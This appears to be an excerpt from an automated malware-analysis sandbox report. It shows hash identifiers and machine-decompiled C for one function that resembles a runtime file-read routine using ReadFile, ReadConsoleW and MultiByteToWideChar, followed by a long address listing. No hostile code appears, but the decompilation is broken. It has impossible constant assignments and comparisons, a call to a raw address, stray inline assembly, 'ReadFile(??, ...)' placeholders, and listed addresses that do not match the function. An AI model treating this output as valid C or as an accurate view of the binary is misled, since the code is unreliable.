                                                          • Opcode ID: ce5045e638527aa8e080ac56f3bdf6bf36d966680e1b1d17e648b86f3552a25c
                                                          • Instruction ID: 73efd427173ec298428934771baec82c7c632a7b1cd68bab81f4b1dadacd6e9b
                                                          • Opcode Fuzzy Hash: ce5045e638527aa8e080ac56f3bdf6bf36d966680e1b1d17e648b86f3552a25c
                                                          • Instruction Fuzzy Hash: 5421EB3160C1087EEB109AE49E46FFAB3ACDBC5770F504665F918C6190FA61DE008690
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A28A2 Relevance: 7.6, APIs: 5, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E009A28A2(signed int __ebx, signed int __ecx, signed int __esi) {
				signed char _t247;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				intOrPtr _t253;
				void* _t254;
				void* _t255;
				signed int _t256;
				signed int _t258;
				long _t259;
				char* _t261;
				signed char _t265;
				signed char _t266;
				signed int _t267;
				signed int _t268;
				signed char _t269;
				signed int _t277;
				intOrPtr _t278;
				void* _t280;
				void* _t281;
				void* _t282;
				void* _t283;
				signed int _t287;
				void* _t288;
				signed int _t291;
				signed int _t292;
				intOrPtr _t294;
				void* _t296;
				signed char _t297;
				signed int _t298;
				signed char _t299;
				signed int _t300;
				signed int _t302;
				signed int _t313;
				char _t314;
				char _t315;
				signed int _t317;
				void* _t318;
				signed char _t319;
				signed int _t327;
				intOrPtr _t328;
				void* _t330;
				void* _t331;
				void* _t332;
				signed int _t334;
				signed int _t335;
				void* _t336;
				long _t338;
				void _t346;
				void _t349;
				signed int _t355;
				signed int _t357;
				char* _t358;
				signed int _t359;
				void* _t360;
				intOrPtr _t362;
				signed int _t363;
				signed int _t368;
				long _t369;
				void* _t370;
				intOrPtr _t371;
				char _t374;
				signed int _t376;
				void* _t377;
				intOrPtr _t378;
				signed int _t380;
				void* _t383;
				intOrPtr _t384;
				intOrPtr _t387;
				char _t388;
				intOrPtr _t389;
				intOrPtr _t390;
				signed int _t391;
				void* _t392;
				void* _t393;
				void* _t394;
				signed int _t396;
				void _t399;
				void* _t400;
				void* _t401;
				signed int _t403;
				signed short* _t406;
				signed int _t407;
				void* _t410;
				char* _t412;
				signed int _t413;
				signed int _t417;
				intOrPtr _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed char* _t422;
				int _t423;
				signed int _t424;
				void* _t426;
				void* _t428;

				_t415 = __esi;
				_t359 = __ecx;
				_t355 = __ebx;
				 *((char*)(_t426 + 0x13)) = 0x8100009a;
				if(0xffffffff81000099 == 0) {
					_t247 =  !__esi;
					__eflags = _t247 & 0x00000001;
					if((_t247 & 0x00000001) == 0) {
						goto L2;
					} else {
						_t415 = __esi >> 1;
						__eflags = _t415 - 4;
						if(_t415 < 4) {
							_t415 = 4;
						}
						_t252 = E009B22C8(_t389, _t415);
						 *(_t426 - 0x10) = _t252;
						_pop(_t360);
						__eflags = _t252;
						if(__eflags != 0) {
							_t253 = E009B3F56(_t360, __eflags,  *((intOrPtr*)(_t426 + 8)), 0, 0, 1);
							_t428 = _t428 + 0x10;
							_t362 =  *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4));
							 *((intOrPtr*)(_t362 + _t355 + 0x28)) = _t253;
							_t254 =  *(_t426 - 0x10);
							 *((intOrPtr*)(_t362 + _t355 + 0x2c)) = _t389;
							_t359 =  *(_t426 - 0xc);
							goto L14;
						} else {
							 *((intOrPtr*)(E009AF100())) = 0xc;
							_t250 = E009AF0CC();
							 *_t250 = 8;
							goto L162;
						}
					}
				} else {
					if(0xffffffff81000098 != 0) {
						L7:
						_t254 =  *(_t426 + 0xc);
						 *(_t426 - 0x10) = _t254;
						L14:
						_t390 =  *((intOrPtr*)(0x9cf230 + _t359 * 4));
						_t363 =  *(_t426 - 0xc);
						 *(_t426 - 0x1c) = _t254;
						if(( *(_t390 + _t355 + 4) & 0x00000048) != 0) {
							_t399 =  *((intOrPtr*)(_t390 + _t355 + 5));
							if(_t399 != 0xa && _t415 != 0) {
								 *_t254 = _t399;
								_t29 = _t254 + 1; // 0x9b2b48
								_t400 = _t29;
								_t403 = 1;
								_t415 = _t415 - 1;
								 *(_t426 - 0x1c) = _t400;
								 *((char*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 5)) = 0xa;
								if( *((char*)(_t426 + 0x13)) != 0) {
									_t39 = _t355 + 0x25; // 0x45c60975
									_t346 =  *((intOrPtr*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t39));
									if(_t346 != 0xa && _t415 != 0) {
										 *_t400 = _t346;
										_t401 = _t400 + 1;
										_t415 = _t415 - 1;
										 *(_t426 - 0x1c) = _t401;
										_t403 = 2;
										 *((char*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 0x25)) = 0xa;
										if( *((char*)(_t426 + 0x13)) == 1) {
											_t349 =  *((intOrPtr*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 0x26));
											if(_t349 != 0xa && _t415 != 0) {
												 *_t401 = _t349;
												_t415 = _t415 - 1;
												_t403 = 3;
												_t388 = 0xa;
												 *(_t426 - 0x1c) = _t401 + 1;
												 *((char*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 0x26)) = _t388;
											}
										}
									}
								}
							}
						}
						_t255 = E009B3924( *((intOrPtr*)(_t426 + 8)));
						_t256 =  *(_t426 - 0xc);
						if(_t255 == 0) {
							L35:
							_t258 = ReadFile( *( *((intOrPtr*)(0x9cf230 + _t256 * 4)) + _t355),  *(_t426 - 0x1c), _t415, _t426 - 0x14, 0); // executed
							__eflags = _t258;
							if(_t258 == 0) {
								L157:
								_t259 = GetLastError();
								_t417 = 5;
								__eflags = _t259 - _t417;
								if(_t259 != _t417) {
									__eflags = _t259 - 0x6d;
									if(_t259 != 0x6d) {
										goto L30;
									}
									_t357 = 0;
									goto L32;
								}
								 *((intOrPtr*)(E009AF100())) = 9;
								 *(E009AF0CC()) = _t417;
								goto L31;
							}
							_t368 =  *(_t426 - 0x14);
							__eflags = _t368;
							if(_t368 < 0) {
								goto L157;
							}
							__eflags = _t368 - _t415;
							if(_t368 > _t415) {
								goto L157;
							}
							goto L38;
						} else {
							_t387 =  *((intOrPtr*)(0x9cf230 + _t256 * 4));
							if(( *(_t387 + _t355 + 4) & 0x00000080) == 0) {
								goto L35;
							}
							_t338 = GetConsoleMode( *(_t387 + _t355), _t426 - 0x20);
							 *(_t426 - 0x20) = _t338;
							if(_t338 == 0 ||  *((char*)(_t426 + 0x13)) != 2) {
								_t256 =  *(_t426 - 0xc);
								goto L35;
							} else {
								if(ReadConsoleW( *( *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4)) + _t355),  *(_t426 - 0x1c), _t415 >> 1, _t426 - 0x14, 0) != 0) {
									_t368 =  *(_t426 - 0x14) +  *(_t426 - 0x14);
									 *(_t426 - 0x14) = _t368;
									L38:
									_t391 =  *(_t426 - 0xc);
									_t403 = _t403 + _t368;
									_t418 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
									_t88 = _t355 + 4; // 0x840ffff8
									_t265 =  *((intOrPtr*)(_t418 + _t88));
									__eflags = _t265;
									if(_t265 >= 0) {
										L98:
										_t261 =  *(_t426 - 0x10);
										L99:
										_t357 =  *(_t426 - 0x18);
										0x74a7428b();
										L101:
										if(_t261 !=  *(_t426 + 0xc)) {
											E009B2248(_t261);
										}
										if(_t357 != 0xfffffffe) {
											_t403 = _t357;
										}
										_t251 = _t403;
										L163:
										return _t251;
									}
									__eflags =  *((char*)(_t426 + 0x13)) - 2;
									if( *((char*)(_t426 + 0x13)) == 2) {
										__eflags =  *(_t426 - 0x20);
										if( *(_t426 - 0x20) == 0) {
											__eflags = _t368;
											if(_t368 == 0) {
												L124:
												_t266 = _t265 & 0x000000fb;
												__eflags = _t266;
												L125:
												 *(_t418 + _t355 + 4) = _t266;
												_t267 =  *(_t426 - 0x10);
												_t419 = _t267;
												 *(_t426 - 0x28) = _t267;
												_t369 = _t267 + _t403;
												 *(_t426 - 0x20) = _t369;
												__eflags = _t267 - _t369;
												if(_t267 >= _t369) {
													L156:
													_t261 =  *(_t426 - 0x10);
													_t403 = _t419 - _t261;
													goto L99;
												}
												_t370 = 0xd;
												 *((intOrPtr*)(_t426 + 0x10)) = 0x1a;
												_t406 = _t267;
												while(1) {
													_t268 =  *_t406 & 0x0000ffff;
													__eflags = _t268 -  *((intOrPtr*)(_t426 + 0x10));
													if(_t268 ==  *((intOrPtr*)(_t426 + 0x10))) {
														break;
													}
													__eflags = _t268 - _t370;
													if(_t268 == _t370) {
														__eflags = _t406 -  *(_t426 - 0x20) + 0xfffffffe;
														if(_t406 >=  *(_t426 - 0x20) + 0xfffffffe) {
															_t406 =  &(_t406[1]);
															_t277 = ReadFile( *( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355), _t426 - 8, 2, _t426 - 0x14, 0);
															__eflags = _t277;
															if(_t277 != 0) {
																L137:
																__eflags =  *(_t426 - 0x14);
																if( *(_t426 - 0x14) == 0) {
																	L152:
																	_t391 =  *(_t426 - 0xc);
																	_t370 = 0xd;
																	 *_t419 = _t370;
																	_t419 = _t419 + 2;
																	L144:
																	__eflags = _t406 -  *(_t426 - 0x20);
																	if(_t406 <  *(_t426 - 0x20)) {
																		continue;
																	}
																	goto L156;
																}
																_t391 =  *(_t426 - 0xc);
																_t278 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
																__eflags =  *(_t278 + _t355 + 4) & 0x00000048;
																if(( *(_t278 + _t355 + 4) & 0x00000048) == 0) {
																	__eflags = _t419 -  *(_t426 - 0x10);
																	if(__eflags != 0) {
																		L149:
																		E009B3F56(_t370, __eflags,  *((intOrPtr*)(_t426 + 8)), 0xfffffffe, 0xffffffff, 1);
																		_t391 =  *(_t426 - 0xc);
																		_t428 = _t428 + 0x10;
																		_t280 = 0xa;
																		__eflags =  *(_t426 - 8) - _t280;
																		if( *(_t426 - 8) == _t280) {
																			L142:
																			_push(0xd);
																			L143:
																			_pop(_t370);
																			goto L144;
																		}
																		_t370 = 0xd;
																		 *_t419 = _t370;
																		L151:
																		_t419 = _t419 + 2;
																		goto L144;
																	}
																	_t281 = 0xa;
																	__eflags =  *(_t426 - 8) - _t281;
																	if(__eflags != 0) {
																		goto L149;
																	}
																	 *_t419 = _t281;
																	_t419 = _t419 + 2;
																	goto L142;
																}
																_t282 = 0xa;
																_push(0xd);
																__eflags =  *(_t426 - 8) - _t282;
																if( *(_t426 - 8) != _t282) {
																	_pop(_t283);
																	 *_t419 = _t283;
																	_t419 = _t419 + 2;
																	__eflags = _t419;
																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 5)) =  *(_t426 - 8);
																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 0x25)) =  *((intOrPtr*)(_t426 - 7));
																	_t374 = 0xa;
																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 0x26)) = _t374;
																	goto L142;
																}
																 *_t419 = _t282;
																_t419 = _t419 + 2;
																goto L143;
															}
															_t287 = GetLastError();
															__eflags = _t287;
															if(_t287 != 0) {
																goto L152;
															}
															goto L137;
														}
														_t392 = 0xa;
														__eflags = _t406[1] - _t392;
														_t391 =  *(_t426 - 0xc);
														if(_t406[1] != _t392) {
															 *_t419 = _t370;
															L134:
															_t419 = _t419 + 2;
															_t406 =  &(_t406[1]);
															goto L144;
														}
														_t288 = 0xa;
														_t406 =  &(_t406[2]);
														 *_t419 = _t288;
														goto L151;
													}
													 *_t419 = _t268;
													goto L134;
												}
												_t371 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
												_t269 =  *(_t371 + _t355 + 4);
												__eflags = _t269 & 0x00000040;
												if((_t269 & 0x00000040) != 0) {
													 *_t419 =  *_t406;
													_t419 = _t419 + 2;
													__eflags = _t419;
												} else {
													 *(_t371 + _t355 + 4) = _t269 | 0x00000002;
												}
												goto L156;
											}
											_t393 = 0xa;
											__eflags =  *( *(_t426 - 0x10)) - _t393;
											_t391 =  *(_t426 - 0xc);
											if( *( *(_t426 - 0x10)) != _t393) {
												goto L124;
											}
											_t266 = _t265 | 0x00000004;
											goto L125;
										}
										_t420 =  *(_t426 - 0x10);
										asm("cdq");
										_t407 = _t420;
										_t376 = _t420;
										_t291 = _t403 - _t391 >> 1;
										_t394 = _t407 + _t291 * 2;
										__eflags = _t407 - _t394;
										if(_t407 >= _t394) {
											L120:
											_t261 =  *(_t426 - 0x10);
											_t403 = _t420 - _t261 & 0xfffffffe;
											goto L99;
										}
										 *((intOrPtr*)(_t426 + 0x10)) = 0x1a;
										asm("sbb al, [eax]");
										 *_t291 =  *_t291 + _t291;
										__eflags =  *_t291;
										_t410 = 0xd;
										while(1) {
											_t292 =  *_t376 & 0x0000ffff;
											__eflags = _t292 -  *((intOrPtr*)(_t426 + 0x10));
											if(_t292 ==  *((intOrPtr*)(_t426 + 0x10))) {
												break;
											}
											__eflags = _t292 - _t410;
											if(_t292 == _t410) {
												__eflags = _t376 - _t394 - 2;
												if(_t376 < _t394 - 2) {
													_t376 = _t376 + 2;
													_t296 = 0xa;
													__eflags =  *_t376 - _t296;
													if( *_t376 != _t296) {
														_t296 = 0xd;
														_t410 = _t296;
													}
													 *_t420 = _t296;
													_t420 = _t420 + 2;
													__eflags = _t420;
												}
											} else {
												 *_t420 = _t292;
												_t420 = _t420 + 2;
												_t376 = _t376 + 2;
											}
											__eflags = _t376 - _t394;
											if(_t376 < _t394) {
												continue;
											} else {
												goto L120;
											}
										}
										_t294 =  *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4));
										_t181 = _t294 + _t355 + 4;
										 *_t181 =  *(_t294 + _t355 + 4) | 0x00000002;
										__eflags =  *_t181;
										goto L120;
									}
									__eflags = _t368;
									if(_t368 == 0) {
										L43:
										_t297 = _t265 & 0x000000fb;
										__eflags = _t297;
										L44:
										 *(_t418 + _t355 + 4) = _t297;
										_t298 =  *(_t426 - 0x10);
										_t421 = _t298;
										 *(_t426 - 0x20) = _t298;
										_t377 = _t298 + _t403;
										 *(_t426 - 0x1c) = _t377;
										__eflags = _t298 - _t377;
										if(_t298 >= _t377) {
											L75:
											_t261 =  *(_t426 - 0x10);
											_t403 = _t421 - _t261;
											__eflags =  *((char*)(_t426 + 0x13)) - 1;
											if( *((char*)(_t426 + 0x13)) != 1) {
												goto L99;
											}
											__eflags = _t403;
											if(_t403 == 0) {
												goto L99;
											}
											_t422 = _t421 - 1;
											_t299 =  *_t422;
											__eflags = _t299;
											if(_t299 < 0) {
												_t300 = _t299 & 0x000000ff;
												_t396 = 1;
												__eflags =  *((char*)(_t300 + 0x9ce408));
												if( *((char*)(_t300 + 0x9ce408)) != 0) {
													L85:
													_t302 =  *((char*)(( *_t422 & 0x000000ff) + 0x9ce408));
													__eflags = _t302;
													if(_t302 != 0) {
														__eflags = _t302 + 1 - _t396;
														if(_t302 + 1 != _t396) {
															_t378 =  *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4));
															__eflags =  *(_t378 + _t355 + 4) & 0x00000048;
															if(__eflags == 0) {
																asm("cdq");
																E009B3F56(_t378, __eflags,  *((intOrPtr*)(_t426 + 8)),  ~_t396,  ~_t396, 1);
															} else {
																_t424 =  &(_t422[1]);
																 *((char*)(_t378 + _t355 + 5)) =  *_t422;
																_t313 =  *(_t426 - 0xc);
																__eflags = _t396 - 2;
																if(_t396 >= 2) {
																	_t315 =  *_t424;
																	_t424 = _t424 + 1;
																	__eflags = _t424;
																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t313 * 4)) + _t355 + 0x25)) = _t315;
																	_t313 =  *(_t426 - 0xc);
																}
																__eflags = _t396 - 3;
																if(_t396 == 3) {
																	_t314 =  *_t424;
																	_t424 = _t424 + 1;
																	__eflags = _t424;
																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t313 * 4)) + _t355 + 0x26)) = _t314;
																}
																_t422 = _t424 - _t396;
															}
														} else {
															_t422 =  &(_t422[_t396]);
														}
														L96:
														_t412 =  *(_t426 - 0x10);
														_t423 = _t422 - _t412;
														_t403 = MultiByteToWideChar(0xfde9, 0, _t412, _t423,  *(_t426 + 0xc),  *(_t426 - 0x28) >> 1);
														__eflags = _t403;
														if(_t403 == 0) {
															goto L29;
														}
														__eflags = _t403 - _t423;
														_t380 = 0 | _t403 != _t423;
														_t403 = _t403 + _t403;
														__eflags = _t403;
														 *( *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4)) + _t355 + 0x30) = _t380;
														goto L98;
													}
													 *((intOrPtr*)(E009AF100())) = 0x2a;
													L31:
													_t357 = _t355 | 0xffffffff;
													L32:
													_t261 =  *(_t426 - 0x10);
													goto L101;
												}
												_t358 =  *(_t426 - 0x10);
												while(1) {
													__eflags = _t396 - 4;
													if(_t396 > 4) {
														break;
													}
													__eflags = _t422 - _t358;
													if(_t422 < _t358) {
														break;
													}
													_t422 = _t422 - 1;
													_t396 = _t396 + 1;
													_t317 =  *_t422 & 0x000000ff;
													__eflags =  *((char*)(_t317 + 0x9ce408));
													if( *((char*)(_t317 + 0x9ce408)) == 0) {
														continue;
													}
													break;
												}
												_t355 =  *(_t426 - 0x24);
												goto L85;
											}
											_t422 =  &(_t422[1]);
											goto L96;
										}
										_t383 = 0xd;
										_t413 = _t298;
										while(1) {
											_t318 =  *_t413;
											__eflags = _t318 - 0x1a;
											if(_t318 == 0x1a) {
												break;
											}
											__eflags = _t318 - _t383;
											if(_t318 == _t383) {
												__eflags = _t413 -  *(_t426 - 0x1c) - 1;
												if(_t413 >=  *(_t426 - 0x1c) - 1) {
													_push(0);
													_t413 = _t413 + 1;
													__eflags = _t413;
													_push(_t426 - 0x14);
													_push(1);
													 *((intOrPtr*)(_t426 - 0x74af00bb)) =  *((intOrPtr*)(_t426 - 0x74af00bb)) + _t383;
													asm("pushfd");
													_t355 = _t355 + _t355;
													_t327 = ReadFile(??, ??, ??, ??, ??);
													__eflags = _t327;
													if(_t327 != 0) {
														L56:
														__eflags =  *(_t426 - 0x14);
														if( *(_t426 - 0x14) == 0) {
															goto L71;
														}
														_t391 =  *(_t426 - 0xc);
														_t328 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
														__eflags =  *(_t328 + _t355 + 4) & 0x00000048;
														if(( *(_t328 + _t355 + 4) & 0x00000048) == 0) {
															__eflags = _t421 -  *(_t426 - 0x10);
															if(__eflags != 0) {
																L68:
																E009B3F56(_t383, __eflags,  *((intOrPtr*)(_t426 + 8)), 0xffffffff, 0xffffffff, 1);
																_t391 =  *(_t426 - 0xc);
																_t428 = _t428 + 0x10;
																_t330 = 0xa;
																__eflags =  *((intOrPtr*)(_t426 - 1)) - _t330;
																if( *((intOrPtr*)(_t426 - 1)) == _t330) {
																	L64:
																	_push(0xd);
																	L65:
																	_pop(_t383);
																	goto L66;
																}
																_t383 = 0xd;
																 *_t421 = _t383;
																L70:
																_t421 = _t421 + 1;
																goto L66;
															}
															_t331 = 0xa;
															__eflags =  *((intOrPtr*)(_t426 - 1)) - _t331;
															if(__eflags != 0) {
																goto L68;
															}
															 *_t421 = _t331;
															_t421 = _t421 + 1;
															__eflags = _t421;
															goto L64;
														}
														_t332 = 0xa;
														_push(0xd);
														__eflags =  *((intOrPtr*)(_t426 - 1)) - _t332;
														if( *((intOrPtr*)(_t426 - 1)) != _t332) {
															 *_t421 = 0xd;
															_t421 = _t421 + 1;
															 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 5)) =  *((intOrPtr*)(_t426 - 1));
														} else {
															 *_t421 = _t332;
															_t421 = _t421 + 1;
														}
														goto L65;
													} else {
														_t334 = GetLastError();
														__eflags = _t334;
														if(_t334 != 0) {
															L71:
															_t391 =  *(_t426 - 0xc);
															_t383 = 0xd;
															 *_t421 = _t383;
															_t421 = _t421 + 1;
															L66:
															__eflags = _t413 -  *(_t426 - 0x1c);
															if(_t413 <  *(_t426 - 0x1c)) {
																continue;
															}
															goto L75;
														}
														goto L56;
													}
												}
												_t98 = _t413 + 1; // 0x9b2b48
												_t335 = _t98;
												__eflags =  *_t335 - 0xa;
												if( *_t335 != 0xa) {
													 *_t421 = _t383;
													_t413 = _t335;
													_t421 = _t421 + 1;
													goto L66;
												}
												_t336 = 0xa;
												_t413 = _t413 + 2;
												 *_t421 = _t336;
												goto L70;
											}
											 *_t421 = _t318;
											_t421 = _t421 + 1;
											_t413 = _t413 + 1;
											goto L66;
										}
										_t384 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
										_t319 =  *(_t384 + _t355 + 4);
										__eflags = _t319 & 0x00000040;
										if((_t319 & 0x00000040) != 0) {
											 *_t421 =  *_t413;
											_t421 = _t421 + 1;
											__eflags = _t421;
										} else {
											 *(_t384 + _t355 + 4) = _t319 | 0x00000002;
										}
										goto L75;
									}
									__eflags =  *( *(_t426 - 0x10)) - 0xa;
									if( *( *(_t426 - 0x10)) != 0xa) {
										goto L43;
									}
									_t297 = _t265 | 0x00000004;
									goto L44;
								}
								L29:
								_t259 = GetLastError();
								L30:
								E009AF0DF(_t259);
								goto L31;
							}
						}
					}
					if(( !__esi & 0x00000001) == 0) {
						L2:
						 *(E009AF0CC()) =  *_t248 & _t403;
						 *((intOrPtr*)(E009AF100())) = 0x16;
						_t250 = E009AEB1E();
						L162:
						_t251 = _t250 | 0xffffffff;
						__eflags = _t251;
						goto L163;
					} else {
						_t415 = __esi & 0xfffffffe;
						goto L7;
					}
				}
			}



































































































                                                          0x009a28a2
                                                          0x009a28a2
                                                          0x009a28a2
                                                          0x009af901
                                                          0x009af908
                                                          0x009af922
                                                          0x009af924
                                                          0x009af926
                                                          0x00000000
                                                          0x009af928
                                                          0x009af928
                                                          0x009af92a
                                                          0x009af92d
                                                          0x009af931
                                                          0x009af931
                                                          0x009af933
                                                          0x009af938
                                                          0x009af93b
                                                          0x009af93c
                                                          0x009af93e
                                                          0x009af964
                                                          0x009af96c
                                                          0x009af96f
                                                          0x009af976
                                                          0x009af97a
                                                          0x009af97d
                                                          0x009af981
                                                          0x00000000
                                                          0x009af940
                                                          0x009af945
                                                          0x009af94b
                                                          0x009af950
                                                          0x00000000
                                                          0x009af950
                                                          0x009af93e
                                                          0x009af90a
                                                          0x009af90b
                                                          0x009af918
                                                          0x009af918
                                                          0x009af91b
                                                          0x009af984
                                                          0x009af984
                                                          0x009af98b
                                                          0x009af98e
                                                          0x009af996
                                                          0x009af99c
                                                          0x009af9a3
                                                          0x009af9a9
                                                          0x009af9ad
                                                          0x009af9ad
                                                          0x009af9b0
                                                          0x009af9b8
                                                          0x009af9bd
                                                          0x009af9c0
                                                          0x009af9c5
                                                          0x009af9ce
                                                          0x009af9ce
                                                          0x009af9d4
                                                          0x009af9da
                                                          0x009af9dc
                                                          0x009af9e4
                                                          0x009af9eb
                                                          0x009af9ee
                                                          0x009af9ef
                                                          0x009af9f4
                                                          0x009af9fd
                                                          0x009afa03
                                                          0x009afa0b
                                                          0x009afa15
                                                          0x009afa16
                                                          0x009afa19
                                                          0x009afa1a
                                                          0x009afa1d
                                                          0x009afa1d
                                                          0x009afa03
                                                          0x009af9f4
                                                          0x009af9d4
                                                          0x009af9c5
                                                          0x009af9a3
                                                          0x009afa24
                                                          0x009afa2b
                                                          0x009afa2f
                                                          0x009afaa2
                                                          0x009afab6
                                                          0x009afabc
                                                          0x009afabe
                                                          0x009aff82
                                                          0x009aff82
                                                          0x009aff8a
                                                          0x009aff8b
                                                          0x009aff8d
                                                          0x009affa6
                                                          0x009affa9
                                                          0x00000000
                                                          0x00000000
                                                          0x009affaf
                                                          0x00000000
                                                          0x009affaf
                                                          0x009aff94
                                                          0x009aff9f
                                                          0x00000000
                                                          0x009aff9f
                                                          0x009afac4
                                                          0x009afac7
                                                          0x009afac9
                                                          0x00000000
                                                          0x00000000
                                                          0x009afacf
                                                          0x009afad1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009afa31
                                                          0x009afa31
                                                          0x009afa3d
                                                          0x00000000
                                                          0x00000000
                                                          0x009afa46
                                                          0x009afa4c
                                                          0x009afa51
                                                          0x009afa9f
                                                          0x00000000
                                                          0x009afa59
                                                          0x009afa7a
                                                          0x009afa97
                                                          0x009afa9a
                                                          0x009afad7
                                                          0x009afad7
                                                          0x009afada
                                                          0x009afadc
                                                          0x009afae3
                                                          0x009afae3
                                                          0x009afae7
                                                          0x009afae9
                                                          0x009afd46
                                                          0x009afd46
                                                          0x009afd49
                                                          0x009afd49
                                                          0x009afd4b
                                                          0x009afd4c
                                                          0x009afd4f
                                                          0x009afd52
                                                          0x009afd57
                                                          0x009afd5b
                                                          0x009afd5d
                                                          0x009afd5d
                                                          0x009afd5f
                                                          0x009affd4
                                                          0x009affda
                                                          0x009affda
                                                          0x009afaef
                                                          0x009afaf3
                                                          0x009afd66
                                                          0x009afd6a
                                                          0x009afde5
                                                          0x009afde7
                                                          0x009afdfb
                                                          0x009afdfb
                                                          0x009afdfb
                                                          0x009afdfd
                                                          0x009afdfd
                                                          0x009afe01
                                                          0x009afe04
                                                          0x009afe06
                                                          0x009afe09
                                                          0x009afe0c
                                                          0x009afe0f
                                                          0x009afe11
                                                          0x009aff76
                                                          0x009aff76
                                                          0x009aff7b
                                                          0x00000000
                                                          0x009aff7b
                                                          0x009afe19
                                                          0x009afe1a
                                                          0x009afe21
                                                          0x009afe23
                                                          0x009afe23
                                                          0x009afe26
                                                          0x009afe2a
                                                          0x00000000
                                                          0x00000000
                                                          0x009afe30
                                                          0x009afe33
                                                          0x009afe40
                                                          0x009afe42
                                                          0x009afe71
                                                          0x009afe85
                                                          0x009afe8b
                                                          0x009afe8d
                                                          0x009afe9d
                                                          0x009afe9d
                                                          0x009afea1
                                                          0x009aff48
                                                          0x009aff48
                                                          0x009aff4d
                                                          0x009aff4e
                                                          0x009aff51
                                                          0x009afeff
                                                          0x009afeff
                                                          0x009aff02
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009aff08
                                                          0x009afea7
                                                          0x009afeaa
                                                          0x009afeb1
                                                          0x009afeb6
                                                          0x009aff0a
                                                          0x009aff0d
                                                          0x009aff20
                                                          0x009aff29
                                                          0x009aff2e
                                                          0x009aff31
                                                          0x009aff36
                                                          0x009aff37
                                                          0x009aff3b
                                                          0x009afefc
                                                          0x009afefc
                                                          0x009afefe
                                                          0x009afefe
                                                          0x00000000
                                                          0x009afefe
                                                          0x009aff3f
                                                          0x009aff40
                                                          0x009aff43
                                                          0x009aff43
                                                          0x00000000
                                                          0x009aff43
                                                          0x009aff11
                                                          0x009aff12
                                                          0x009aff16
                                                          0x00000000
                                                          0x00000000
                                                          0x009aff18
                                                          0x009aff1b
                                                          0x00000000
                                                          0x009aff1b
                                                          0x009afeba
                                                          0x009afebb
                                                          0x009afebd
                                                          0x009afec1
                                                          0x009afecb
                                                          0x009afecc
                                                          0x009afecf
                                                          0x009afecf
                                                          0x009afede
                                                          0x009afeec
                                                          0x009afef7
                                                          0x009afef8
                                                          0x00000000
                                                          0x009afef8
                                                          0x009afec3
                                                          0x009afec6
                                                          0x00000000
                                                          0x009afec6
                                                          0x009afe8f
                                                          0x009afe95
                                                          0x009afe97
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009afe97
                                                          0x009afe46
                                                          0x009afe47
                                                          0x009afe4b
                                                          0x009afe4e
                                                          0x009afe5e
                                                          0x009afe61
                                                          0x009afe61
                                                          0x009afe64
                                                          0x00000000
                                                          0x009afe64
                                                          0x009afe52
                                                          0x009afe53
                                                          0x009afe56
                                                          0x00000000
                                                          0x009afe56
                                                          0x009afe35
                                                          0x00000000
                                                          0x009afe35
                                                          0x009aff56
                                                          0x009aff5d
                                                          0x009aff61
                                                          0x009aff63
                                                          0x009aff70
                                                          0x009aff73
                                                          0x009aff73
                                                          0x009aff65
                                                          0x009aff67
                                                          0x009aff67
                                                          0x00000000
                                                          0x009aff63
                                                          0x009afdee
                                                          0x009afdef
                                                          0x009afdf2
                                                          0x009afdf5
                                                          0x00000000
                                                          0x00000000
                                                          0x009afdf7
                                                          0x00000000
                                                          0x009afdf7
                                                          0x009afd6c
                                                          0x009afd71
                                                          0x009afd72
                                                          0x009afd76
                                                          0x009afd78
                                                          0x009afd7a
                                                          0x009afd7d
                                                          0x009afd7f
                                                          0x009afdd6
                                                          0x009afdd6
                                                          0x009afddd
                                                          0x00000000
                                                          0x009afddd
                                                          0x009afd83
                                                          0x009afd86
                                                          0x009afd88
                                                          0x009afd88
                                                          0x009afd8a
                                                          0x009afd8b
                                                          0x009afd8b
                                                          0x009afd8e
                                                          0x009afd92
                                                          0x00000000
                                                          0x00000000
                                                          0x009afd94
                                                          0x009afd97
                                                          0x009afda7
                                                          0x009afda9
                                                          0x009afdab
                                                          0x009afdb0
                                                          0x009afdb1
                                                          0x009afdb4
                                                          0x009afdb8
                                                          0x009afdba
                                                          0x009afdba
                                                          0x009afdbb
                                                          0x009afdbe
                                                          0x009afdbe
                                                          0x009afdbe
                                                          0x009afd99
                                                          0x009afd99
                                                          0x009afd9c
                                                          0x009afd9f
                                                          0x009afd9f
                                                          0x009afdc1
                                                          0x009afdc3
                                                          0x00000000
                                                          0x009afdc5
                                                          0x00000000
                                                          0x009afdc5
                                                          0x009afdc3
                                                          0x009afdca
                                                          0x009afdd1
                                                          0x009afdd1
                                                          0x009afdd1
                                                          0x00000000
                                                          0x009afdd1
                                                          0x009afaf9
                                                          0x009afafb
                                                          0x009afb09
                                                          0x009afb09
                                                          0x009afb09
